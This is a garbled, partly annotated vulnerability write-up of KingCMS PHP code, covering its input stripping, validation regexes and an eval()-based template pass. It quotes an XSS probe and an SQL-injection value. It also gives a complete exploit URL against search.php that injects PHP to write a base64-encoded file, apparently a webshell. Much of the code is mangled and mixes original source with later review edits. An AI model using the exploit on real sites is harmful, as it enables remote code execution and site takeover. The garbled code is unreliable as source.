Detailed description:
// Request bootstrap run on every page load. As listed here it does three things:
//  1) when KC_MAGIC_QUOTES_GPC is set, undo magic_quotes escaping on $_GET,
//     $_POST and $_COOKIE via kc_stripslashes_array;
//  2) HTML-escape a fixed set of request-path $_SERVER entries so that echoing
//     them into a page cannot inject markup (the reflected-XSS vector the
//     author notes below);
//  3) record in $GLOBALS['ismethod'] whether the request is treated as POST.
// NOTE(review): this listing is a garbled extraction — `$ _ GET` is $_GET, the
// keys are the usual upper-case $_SERVER names, and the single `=` / `|` on the
// ismethod line presumably stand for `==` / `||`; confirm against the real file.
Function kc_pageLoad (){
If (KC_MAGIC_QUOTES_GPC ){
$ _ GET = kc_stripslashes_array ($ _ GET );
$ _ POST = kc_stripslashes_array ($ _ POST );
$ _ COOKIE = kc_stripslashes_array ($ _ COOKIE );
// Only these five keys are escaped. Any other $_SERVER value a template echoes
// (REQUEST_URI, HTTP_REFERER, ...) still needs escaping at the output point.
$ Array = array ('php _ SELF ', 'script _ URI', 'query _ string', 'path _ info', 'path _ TRANSLATED ');
Foreach ($ array as $ val ){
If (isset ($ _ SERVER [$ val])
$ _ SERVER [$ val] = htmlspecialchars ($ _ SERVER [$ val]);
// Here the programmer considers the problem of cross-site
// For example, we submit a fuca. php/"> <script> alert (/Samy/) </script>
// A reflected XSS
}
// NOTE(review): with the braces as laid out here the escaping loop is nested
// inside the KC_MAGIC_QUOTES_GPC branch, so with magic quotes off these
// $_SERVER entries are never escaped. Check the brace placement in the real
// source; if it matches, the loop belongs outside the if.
}
// Set the ismethod value to true: post; false: get
// kc_post() is defined elsewhere in the project; presumably it reads a POST
// field named 'method' — verify against its definition.
$ Ismethod = kc_post ('method ')? True: False;
// Reads as: ismethod is false for a GET request or when the 'method' field is
// present, true otherwise. The leading `!` yields a bool either way, so the
// exact operator (`|` vs `||`) does not change the stored value.
$ GLOBALS ['ismethod'] =! ($ _ SERVER ['request _ method'] = 'get' | $ ismethod );
}
/**
 * Recursively undo addslashes()/magic_quotes escaping on a request value.
 *
 * Scalars are handed straight to stripslashes(); arrays are walked and every
 * leaf is unescaped in place, keeping the original keys. The argument is taken
 * by reference and the result is also returned, so callers may use either form.
 *
 * @param mixed $_data  string or (nested) array of strings
 * @return mixed        the unescaped value
 */
function kc_stripslashes_array(&$_data)
{
    if (!is_array($_data)) {
        return stripslashes($_data);
    }
    foreach (array_keys($_data) as $k) {
        $_data[$k] = kc_stripslashes_array($_data[$k]);
    }
    return $_data;
}
This reverses addslashes(): while it strips the escape characters, it also makes injection easier for us.
Therefore the programmer also wrote a function that fetches values from the GET and POST arrays and calls kc_validate, which matches the submitted value against a regular expression:
Function kc_get ($ name, $ type = 2, $ is = 0 ){
Global $ king;
$ Val = isset ($ _ GET [$ name])? $ _ GET [$ name]: '';
If (! Isset ($ val {0 }))
$ Val = isset ($ _ POST [$ name])? $ _ POST [$ name]: '';
If (isset ($ val {0 })){
If (kc_validate ($ val, $ type )){
$ _ Getid = $ val;
} Else {
Kc_error ($ king-> lang-> get
....
Kc_validate
Function kc_validate ($ s, $ _ type ){
Switch ($ _ type ){
Case 1: $ _ reg = '/^ [a-zA-Z0-9] + $/'; break;
Case 2: $ _ reg = '/^ [0-9] + $/'; break;
Case 3: $ _ reg = '/^ ([0-9 \.] + \,?) + $/'; Break;
Case 4: $ _ reg = '/^ [A-Za-z0-9 \ _] + $/'; break;
Case 5:
$ _ Reg = '/^ \ w + ([-+.] \ w +) * @ \ w + ([-.] \ w + )*\. \ w + ([-.] \ w +) * $/'; break;
Case 6:
// $ _ Reg = '/^ (http | https | ftp) :( \/| \\\\) ([\ w \/\ + \-~ '@: %]) + \.) + ([\ W \/\. \ = \? \ + \-~ '@\:! % #] | (&) | &) + /';
$ _ Reg = '/^ [a-zA-Z] {3, 10 }:\/ \/[^ \ s] + $ /';
Break;
Case 7:
Global $ king;
// $ _ Bool = in_array (kc_f_ext ($ s), explode ('|', $ king-> config ('upimg ')));
// Retrun $ _ bool;
$ _ Reg = '/^ ([a-zA-Z] {3, 10 }:\/\/)? [^ \ S] + \. ('. $ king-> config ('upimg'). ') $ /';
// $ _ Reg = '/^ (http | https | ftp) :( \/| \\\\) ([\ w \/\ + \-~ '@: %]) + \.) + ([\ W \/\. \ = \? \ + \-~ '@\:! % #] | (&) | &) + | ([\ W \/\. \ = \? \ + \-~ '@\':! % #] | (&) | &) +) \. ('. $ King-> config ('upimg'). ') $ /';
Break; // jpeg | jpg | gif | png | bmp
Case 8:
$ _ Reg = '/^ (1 [6-9] | [2-9] \ d) \ d {2})-(0? [1, 13578] | 1 [02])-(0? [1-9] | [12] \ d | 3 [01]) | (1 [6-9] | [2-9] \ d) \ d {2})-(0? [13456789] | 1 [012])-(0? [1-9] | [12] \ d | 30) | (1 [6-9] | [2-9] \ d) \ d {2 }) -0? 2-(0? [1-9] | 1 \ d | 2 [0-8]) | (1 [6-9] | [2-9] \ d) (0 [48] | [2468] [048] | [13579] [26]) | (16 | [2468] [048] | [3579] [26]) 00)-0? 2-29) (20 | 21 | 22 | 23 | [0-1]? \ D): [0-5]? \ D: [0-5]? \ D $/'; break;
Case 9:
$ _ Reg = '/^ (1 [6-9] | [2-9] \ d) \ d {2})-(0? [1, 13578] | 1 [02])-(0? [1-9] | [12] \ d | 3 [01]) | (1 [6-9] | [2-9] \ d) \ d {2})-(0? [13456789] | 1 [012])-(0? [1-9] | [12] \ d | 30) | (1 [6-9] | [2-9] \ d) \ d {2 }) -0? 2-(0? [1-9] | 1 \ d | 2 [0-8]) | (1 [6-9] | [2-9] \ d) (0 [48] | [2468] [048] | [13579] [26]) | (16 | [2468] [048] | [3579] [26]) 00)-0? 2-29) $/'; break;
Case 10: $ _ reg = '/^ \ d? \. \ D? \. \ D {4} $/'; break;
Case 13: $ _ reg = '/^ #? [0-9A-Fa-f] {6 }$/'; break;
Default: $ _ reg = $ _ type;
Case 22: $ _ reg = '/^ \-? [0-9] + $/'; break;
Case 23: $ _ reg = '/^ [a-zA-Z] [a-zA-Z0-9 \ _] */'; break;
Case 24: $ _ reg = '/^ [a-zA-Z0-9-_] + $/'; break;
Case 25: $ _ reg = '/[a-zA-Z0-9 \ + \ %] + (\ =) * $/'; break;
Case 33: $ _ reg = '/^ (\-? [0-9] + \,?) + $/'; Break;
Default: $ _ reg = $ _ type;
..
Code execution:
$ Tmp = $ t? $ T: $ this-> tmp;
If (substr ($ tmp, 0, 6) = '{Tags }'){
$ S = '<div style = "border: 5px solid # CCC; background: # EFEEEE; padding: 15px; line-height: 20px;"> ';
Foreach ($ this-> array as $ key => $ val ){
$ S. = "<tt >{king: $ key/} </tt>-& gt; $ val <br/> ";
}
$ S. = '</div> ';
} Else {
Kc_runtime ('template ');
$ S = preg_replace_callback ($ this-> parent, array (& $ this, 'regexcallback'), $ tmp );
Kc_runtime ('template', 1 );
}
$ Parent = '/<\? (Php )? (\ S *?) (. | \ N) + ?) \?> /Is ';
$ S = preg_replace_callback ($ parent, array (& $ this, 'regexphpcallback'), $ s );
Return $ s;
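/**
 * preg_replace_callback handler for the `<?php ... ?>` template pass.
 *
 * $m is the match array produced by the $parent pattern in the caller; $m[3]
 * holds the code between the `<?php`/`<?` opener and `?>`. That text is run
 * with eval() and whatever it prints is returned as the replacement.
 *
 * NOTE(review): eval() on template text makes every template source a
 * code-execution boundary. The write-up above shows the template being
 * assembled from a value read out of MySQL that originated in a request
 * parameter, which turns a stored string into remote code execution. Either
 * guarantee that template text never contains request-derived data, or drop
 * this pass entirely.
 *
 * @param array $m  match array from preg_replace_callback
 * @return string   output captured from the evaluated code ('' when there is
 *                  no code group)
 */
public function regexphpcallback($m)
{
    // Test the index before reading it: the original read $m[3] first and
    // only then checked isset($php), which raises a notice on a missing group.
    if (!isset($m[3])) {
        // The original returned an undefined $s here; return an empty string.
        return '';
    }
    ob_start();
    eval($m[3]);
    return ob_get_clean();
}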
Because the id enters the Path, we submit l999999.9 or 1 = 1 to generate
Because the value is read from mysql, we cannot control it. We cannot construct webshell.
Code execution:
Http: // localhost/king/search. php? Query = facked ';?> <? Fputs (fopen ('samy. php', 'w'), base64_decode ('mtexpd9wahagqgv2ywwojf9qt1nuwydjbwqnxsk7pz4ymji = ');?> & Amp; modelid = 1 or 2 = 2
Solution: You know !!